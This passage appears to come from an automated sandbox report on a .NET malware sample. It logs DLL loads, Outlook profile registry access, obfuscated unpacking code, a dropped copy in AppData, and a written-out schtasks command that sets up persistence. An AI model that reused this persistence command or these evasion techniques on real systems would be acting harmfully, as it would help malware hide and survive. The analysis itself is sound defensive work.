Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SNKO05B241100201.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SNKO05B241100201.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SNKO05B241100201.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, RvrlIneKRZR8s32r8h.cs

.Net Code: WVfrJ9WNGL System.Reflection.Assembly.Load(byte[])

Source: SNKO05B241100201.exe

Static PE information: 0x82F86961 [Thu Aug 18 22:06:25 2039 UTC]

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Code function: 0_2_070E72B0 push edx; retf

0_2_070E72B1

Source: SNKO05B241100201.exe	Static PE information: section name: .text entropy: 7.894457066412562
Source: HURBBASu.exe.0.dr	Static PE information: section name: .text entropy: 7.894457066412562

Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, A9akA66MhNIy9TUPD0.cs	High entropy of concatenated method names: 'ACRXEHRQ2N', 'OpPXYL7gm1', 'VGf7GPfMoL', 'fXA7lBfiqO', 'r5J7FTuSvK', 'LEW7iyJDE7', 'jwW7q52cVj', 'ruv7wWW5RX', 'VhF7UdDgr6', 'Nj77VLruED'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, nres7ez6qdooh5MqYg.cs	High entropy of concatenated method names: 'CNCxneNZGU', 'CfMx0QF07k', 'lZIxQqmoOw', 'bFUx9QJBVP', 'QtdxIwPCWb', 'SuvxlDGr9r', 'b2fxFLYYHB', 'h4vx52BNXb', 'Xn6xyKIjOd', 'vgjxhOCW8V'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, PtNTsVaDi5oR1no26C.cs	High entropy of concatenated method names: 'lX4L9KZ2yx', 'PP2LIgQHHD', 'PbiLGsfcSe', 'oQLLlirFIo', 'yTtLFMhsfL', 'P1BLic0WwR', 'bxvLqP2XVR', 'aIBLwZsTLB', 'g2WLUi3oxY', 'PVlLV7jJ0r'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, PAhSk68vsJ0My8WFhG.cs	High entropy of concatenated method names: 'dQDsVVQIwY', 'x7ms1GbK3V', 'fi5s8iWj9S', 'UkysfKM3tJ', 'nXcsI3E0bN', 'M7isGTEqoB', 'VMtslwa1DB', 'R25sFYjbJM', 'o4Csi2IdKC', 'mFXsqxYueE'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, ChcSkEtiqKVsITECmv.cs	High entropy of concatenated method names: 'Mt1x7OGaKB', 'M0DxXDYcXL', 'HLDx3R4U0u', 'IBVxSF3Csp', 'EwyxLwSReh', 'SF0xeCETs3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, TKDao3jccKjChx4aoIO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aZMxN3gZpu', 'irxx1OPCcT', 'wDtxTLJGMu', 'XqSx8bgOXs', 'HMKxfUTt4o', 'VtjxoF62Dq', 'P6IxM5nebc'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, Qu8eHC9UlobkEmKyjq.cs	High entropy of concatenated method names: 'fwc3Ba8aC4', 'Vhh3bDfXDp', 'I2g3XvGQKN', 'w1X3S0FRXo', 'TyB3eGf6cU', 'mxsXKiEmdp', 'cpFXgpoQmc', 'jmXX4HGSGQ', 'CYXXuJEqtP', 'zihXaBIAID'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, YIjepCvSp8YX3T5Scu.cs	High entropy of concatenated method names: 'khsJ7hN0y', 'YSom2ehLc', 'M3Yn55fkk', 'zK4YELame', 'RhcQkiZX4', 'Q9N6rBPHu', 'WOhZKoVGTgNg7xmdP3', 'muBlt7Dwx9sJxffFJ7', 'Pl4Cd4Wsc', 'qoWxgHjhH'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, iUCGJsQC8v4E0ZVrQl.cs	High entropy of concatenated method names: 's437mALEnT', 'pZU7nTZ9gi', 'PWZ70yG27g', 'khJ7Qciws7', 'cVV7stKH6l', 'XSS7HYoUYU', 'LeB7DcDThY', 'kUD7C8T6g1', 'XLq7LuZuWP', 'Hku7xXcTl6'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, wQSBQpjr25eXSUvB0bJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B3kkLq56SI', 'UGDkxM1oQI', 'vkRkRTrbdr', 'M7RkkS9FqI', 'pO7kA6L36a', 'tSQkdSGBnI', 'CmIk5QAif2'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, au8FA7MmLcGq2MIqYW.cs	High entropy of concatenated method names: 'knHD2RUsLi', 'cCQDO9kLlm', 'ToString', 'KwrDZIRFtx', 'OZWDbZrmP1', 'ptiD7J0TTG', 'dwDDXL19V6', 'l7hD3DfFdl', 'rviDSjYX4f', 'pNTDePpyc0'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, RvrlIneKRZR8s32r8h.cs	High entropy of concatenated method names: 'qQ7WBV6ctp', 'BAIWZ3rMWf', 'j3nWbvZRTG', 'Y0vW7CdghL', 'SGPWXhBPZc', 'w1YW3a9eJE', 'ljsWSbxAHY', 'YQkWeCukVB', 'WYUWpStoJ8', 'hDQW2fjgQm'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, NjIkb1rVyOIEsWUXEK.cs	High entropy of concatenated method names: 'BNpjSW0RgU', 'jWCjetEMtv', 'oC8j2v4E0Z', 'NrQjOlm9ak', 'PUPjsD0Tu8', 'kHCjHUlobk', 'xWTwUmyJUA1NkMebh8', 'hNGBtJH0ZkrvQrw08M', 'BANjjPGd0X', 'CsvjWI8fYb'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, PuuXqA4wS1M5cAejbL.cs	High entropy of concatenated method names: 'SNrLsOj1cW', 'frDLDshbf8', 'mdyLLUsVse', 'gLJLRmIdC9', 'wOoLAvRqUX', 'dy6L5AYKP8', 'Dispose', 'frPCZ8S0om', 'Io5CbB4i96', 'okjC7mMGqE'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, f0wIjOjjZ7npt8mpH00.cs	High entropy of concatenated method names: 'qB4xt909AR', 'MSoxzHd0lB', 'eAMRcotGC3', 'J0iRjyxe08', 'Y28RvmnDiO', 'nNPRW8wy4V', 'X8FRrFFWib', 'Uj9RBOcIxV', 'dH6RZLnyn1', 'JLWRbnqdOD'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, RfHXoaUQr0DfdhduwT.cs	High entropy of concatenated method names: 'RVrSyTXXq4', 'VZoShaYFbY', 'w4uSJtJkOv', 'LetSmZRxMr', 'KwGSEiE3v3', 'MfVSnfMA1v', 'saHSYPIUyC', 'cxtS0TKHJO', 'z8PSQcKUOg', 'w4kS6ksg6I'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, PeIEr5oA0gRjF2IJId.cs	High entropy of concatenated method names: 'ToString', 'Gi6HNQ0cqV', 'xelHIYxFZD', 'xMhHGDL1qc', 'K24HlhVT4W', 'FpIHFJw48g', 'qt4HiSfALj', 'DV1HqX2pIm', 'py7Hw6PFmM', 'CqoHUygIoH'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, qdhd2jTeHXg1wVtsht.cs	High entropy of concatenated method names: 'Q5LP043GZA', 'WiWPQLvYZx', 'EC0P9YemXh', 'j5gPI1yraT', 'jSqPl2koDw', 'yGqPFdgw4t', 'yi1Pq6Oiw6', 'XrTPwit4FN', 'GlmPVd2UcT', 'BCWPNRxghb'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, hq1G23qKsI396qRpnJ.cs	High entropy of concatenated method names: 'sXHSZMuVUT', 'U6nS77wN3I', 'WqsS3bJbSk', 'cel3t6nv2f', 'ra73zFcGZj', 'iAEScGKO3I', 'AXESjaLKan', 'NV5SvK8dMG', 'o7mSW34NeB', 'KPSSryv1qu'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, omUZUMbFNk3MXD3bFB.cs	High entropy of concatenated method names: 'Dispose', 'PM5jacAejb', 'YXbvIMyMmi', 'VJ5Pu3m72e', 'rbAjtwJJwQ', 'lAZjz8nDFJ', 'ProcessDialogKey', 'y1TvctNTsV', 'qi5vjoR1no', 'l6CvvnhcSk'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, B07PirghG0D73qt5cD.cs	High entropy of concatenated method names: 'htGDuAnxJi', 'EgVDtwc06A', 'wi1CcveJNS', 'EwBCj3v8Tk', 'GayDNUcjKd', 'HbOD1JJLao', 'aLPDTh22dt', 'iQ3D8hWa96', 'G0lDfWA79I', 'R1vDoM0yG6'
Source: 0.2.SNKO05B241100201.exe.8ef0000.5.raw.unpack, lW0RgU03WCtEMtvXHa.cs	High entropy of concatenated method names: 'DO2b8FmxbC', 'Ss8bf9R9TA', 'gA5boM5iFP', 'DerbMo9uE8', 'gsebKJhBre', 'UnQbgGU0Ni', 'Lseb4lsa5r', 'uFybuVnUrx', 'sJNbaf6SfO', 'HJkbt96njd'

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

File created: C:\Users\user\AppData\Roaming\HURBBASu.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
